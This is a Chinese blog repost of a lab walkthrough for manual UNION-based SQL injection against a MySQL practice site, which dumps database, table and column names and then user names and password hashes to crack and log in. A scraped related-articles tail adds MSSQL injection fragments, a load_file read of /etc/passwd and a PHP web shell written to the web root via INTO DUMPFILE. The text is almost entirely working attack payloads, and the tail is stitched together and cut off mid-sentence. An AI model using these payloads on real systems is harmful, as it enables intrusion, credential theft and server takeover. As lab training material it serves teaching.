80、SQL手工注入漏洞测试(MySQL数据库)

原文引用https://www.dazhuanlan.com/2019/08/25/5d62593d1d0a1/

访问网页,进入登陆下方的滚动公告,进行测试注入点
?id=1 and 1=1返回正常,?id=1 and 1=2 返回错误,说明有注入点。

?id=1 order by 5查询列数。一直减少,直到页面返回正常

?id=1 and 1=2 union select 1,version(),database(),4查询版本和数据库名称
(此时知道数据库为mozhe_Discuz_StormGroup)

?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 0,1查询数据库,使用limit0,1表示从第0行开始取1行数据。

?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1查询数据库,使用limit 1,1表示从第1行开始取1行数据。

?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 2,1查询数据库,使用limit 2,1表示从第2行开始取1行数据。

?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 3,1查询数据库,使用limit 3,1表示从第3行开始取1行数据。

?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 4,1查询数据库,使用limit 4,1表示从第4行开始取1行数据。

?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=’mozhe_Discuz_StormGroup’ limit 0,1查询mozhe_Discuz_StormGroup的数据库的表的名字,从第0行取一行数据
(此时知道数据库为表为StromGroup_member)

?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=’mozhe_Discuz_StormGroup’ limit 1,1查询mozhe_Discuz_StormGroup的数据库的表的名字,从第1行取一行数据

?id=1 and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=’mozhe_Discuz_StormGroup’ limit 2,1查询mozhe_Discuz_StormGroup的数据库的表的名字,从第2行取一行数据,返回错误,说明只有2个表。

?id=1 and 1=2 union select 1,column_name,column_type,4 from information_schema.columns where table_name=’StormGroup_member’ limit 0,1查询StormGroup_member的表的字段内容,从第0行取一行数据

?id=1 and 1=2 union select 1,column_name,column_type,4 from information_schema.columns where table_name=’StormGroup_member’ limit 1,1查询StormGroup_member的表的字段内容,从第1行取一行数据

?id=1 and 1=2 union select 1,column_name,column_type,4 from information_schema.columns where table_name=’StormGroup_member’ limit 2,1查询StormGroup_member的表的字段内容,从第2行取一行数据

?id=1 and 1=2 union select 1,column_name,column_type,4 from information_schema.columns where table_name=’StormGroup_member’ limit 3,1查询StormGroup_member的表的字段内容,从第3行取一行数据

?id=1 and 1=2 union select 1,concat(name,’-‘,password,’-‘,status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1获取第0行值

?id=1 and 1=2 union select 1,concat(name,’-‘,password,’-‘,status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1获取第1行值

md5解密,登陆得到key。

原文地址:https://www.cnblogs.com/petewell/p/11408832.html

时间: 2024-11-05 22:58:15

80、SQL手工注入漏洞测试(MySQL数据库)的相关文章

SQL手工注入漏洞测试(Sql Server数据库)

还是先找到注入点,然后order by找出字段数:4 通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段.此处返回的是错误页面,说明系统禁止使用union进行相关SQL查询,我们得使用其他方式进行手工SQL注入. 一.盲注 盲猜爆出表名 通过SQL语句中的and exists(select username from manage)查询,判断manage数据库表表中存在的字段.此处返回内容为正常页面,说

基于dvwa环境下级别为low的SQL手工注入教程

基于dvwa环境下级别为low的SQL手工注入教程: 首先是进入已搭建好的dvwa环境中去(一定要搭建好dvwa环境才能进行下面的操作),这可能会是一些初学者所面临的的第一个问题,比如我,曾为了寻找这个入口,浪费了不少的时间,所以在这里就提一下,最好是能够记住,忘了的话可以随时过来看一下:http://127.0.0.1/DVWA/setup.php. 按照提示点击最下面的按钮创建数据库,创建成功就会直接进入登录页面进行登录,然后就可以直接访问http://127.0.0.1/DVWA/logi

小白日记40:kali渗透测试之Web渗透-SQL手工注入(二)-读取文件、写入文件、反弹shell

SQL手工注入 1.读取文件[load_file函数] ' union  SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+   [写入一句话木马:INTO DUMPLING:MySQL函数,将输入下载在数据库中]

小白日记39:kali渗透测试之Web渗透-SQL手工注入(一)

SQL手工注入(一) SQL注入:通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.[SQL注入原理] ##服务端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器 用户登录判断 SELECT * FROM users WHERE user='uname' AND password='pass'SELECT * FROM users WHERE user='name' AND password='' OR

运用Loadrunner测试Mysql数据库性能 TRON?极客

1.前言 针对数据库的性能测试,loadrunner本身支持sql server和oracle数据库,这两种数据库可以用loadrunner直接录制进行测试.而我们项目中使用的是mysql数据库,针对用 loadrunner测试mysql数据库的方法网上也有很多介绍文章,主要有两种方案.一种是利用ODBC连接测试mysql,但是这种方法配置比较麻 烦,如果要录制的话需要安装支持ODBC连接的查询分析器,这工具不好找,能找到的也只能算凑合能用.如果大家有兴趣试试这种方法,可以上网搜搜,学习配 置一

mssql2005存手工注入漏洞附攻击方法- 寒龙网出品

/**/跟空格的作用一样,有的时候可以过一些过滤爆库语句,修改红色部分的数字挨个猜出库 /**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[

PHP如何通过SQL语句将数据写入MySQL数据库呢?

1,php和MySQL建立连接关系 2,打开 3,接受页面数据,PHP录入到指定的表中 1.2两步可直接使用一个数据库链接文件即可:conn.php <?phpmysql_connect("localhost","root","");//连接MySQLmysql_select_db("hello");//选择数据库?> 当然,前提是已经安装WEB服务器.PHP和MySQL,并且建立MySQL表“webjx” mys

sqoop测试Mysql数据库的使用

测试Mysql数据库的使用 前提:导入mysql jdbc的jar包 ①  测试数据库连接 sqoop list-databases–connect jdbc:mysql://192.168.10.63 –username root–password 123456 ②Sqoop的使用 以下所有的命令每行之后都存在一个空格,不要忘记 (以下6中命令都没有进行过成功测试) <1>mysql–>hdfs sqoop export –connect jdbc:mysql://192.168.10

jmeter JDBC请求连接测试mysql数据库

所有jmeter基本组件功能本文不做介绍.jmeter要链接mysql数据库,首先得下载mysql jdbc驱动包(注:驱动包的版本一定要与你数据库的版本匹配,驱动版本低于mysql版本有可能会导致连接失败报错)我这里下载的是mysql-connector-java-5.1.7-bin.jar 1.准备好驱动包后,需要把jdbc驱动jar包引入测试计划.操作步骤如下图: 点击测试计划-->点击浏览-->选中mysql驱动jar包-->打开 2 OK,这样驱动就引入进来了.接下来新建一个线